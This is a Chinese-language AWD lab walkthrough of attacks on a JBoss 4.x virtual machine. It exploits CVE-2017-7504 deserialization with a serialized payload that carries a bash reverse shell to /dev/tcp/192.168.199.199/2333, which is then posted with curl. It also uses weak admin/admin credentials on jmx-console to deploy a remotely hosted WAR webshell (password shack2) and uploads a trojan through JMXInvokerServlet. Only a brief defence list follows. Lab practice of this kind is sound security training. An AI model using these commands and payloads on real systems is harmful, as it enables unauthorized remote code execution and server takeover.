Awd环境验证

一、环境搭建，参考本教程

攻击

一、查看开放端口

root@kali:~# nmap 192.168.5.192
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 03:51 EST
Nmap scan report for 192.168.5.192
Host is up (0.00094s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1098/tcp open  rmiactivation
1099/tcp open  rmiregistry
4444/tcp open  krb524
4445/tcp open  upnotifyp
8009/tcp open  ajp13
8080/tcp open  http-proxy
8083/tcp open  us-srv
8093/tcp open  unknown
MAC Address: 00:0C:29:EF:BB:B3 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds

二、发现8080 端口是jboss

image.png

漏洞一

CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞
http://192.168.199.101:8080/jbossmq-httpil/HTTPServerILServlet

前言

序列化就是把对象转换成字节流，便于保存在内存、文件、数据库中；反序列化即逆过程，由字节流还原成对象。
Java中的ObjectOutputStream类的writeObject()方法可以实现序列化，ObjectInputStream类的readObject()方法用于反序列化。
问题的根源在于类ObjectInputStream在反序列化时，没有对生成的对象的类型做限制。

漏洞描述

该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中，其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化，远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。

该漏洞出现在 /invoker/readonly 请求中，服务器将用户提交的POST内容进行了Java反序列化；

image.png

如果页面返回500一般是存在了；

三、漏洞利用工具

http://scan.javasec.cn/java/JavaDeserH2HC.zip

使用方法：

1、javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java     #ExampleCommonsCollections1选择编译并生成序列化数据
2、java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 "bash -i >& /dev/tcp/192.168.199.199/2333 0>&1"     #序列化恶意数据至文件。

第一行命令执行完成后，将生成一个文件ExampleCommonsCollections1.class
第二行命令执行完成后，将生成一个文件ExampleCommonsCollections1.ser

image.png

3、将该文件作为请求数据主体发送如下数据包：
curl http://192.168.199.101:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1.ser
# --data-binary 意为以二进制的方式post数据

image.png

监听2333端口

image.png

漏洞二

弱口令 admin admin
http://192.168.199.101:8080/jmx-console/

image.png
后台部署war包GetShell
https://xz.aliyun.com/t/5326
1、进入jmx-console后台；
2、找到jboss.deployment，点击flavor=URL,type=DeploymentScanner；
3、找到void.addURL()，在输入框中写入一个war包地址，war包包含一个webshell；
4、点击invoke获取一个jsp的webshell地址；
image.png
生成一个war包 http://www.gmlearn.com/sqli-labs/jspbig.war
image.png

成功上传war
http://192.168.199.101:8080/jspbig/jspbig.jsp 密码：shack2

image.png

漏洞三

JMXInvokerServlet-反序列化
用配合工具进行检测

image.png

存在漏洞，上传木马

防御

1、关闭22端口
2、JMXInvokerServlet-反序列化

/opt/jboss/jboss4/server/default/deploy/http-invoker.sar

3、CVE-2017-7504 JBoss 4.x JBossMQ JMS 反序列化漏洞

jbossweb-tomcat55.sar

4、修改弱口令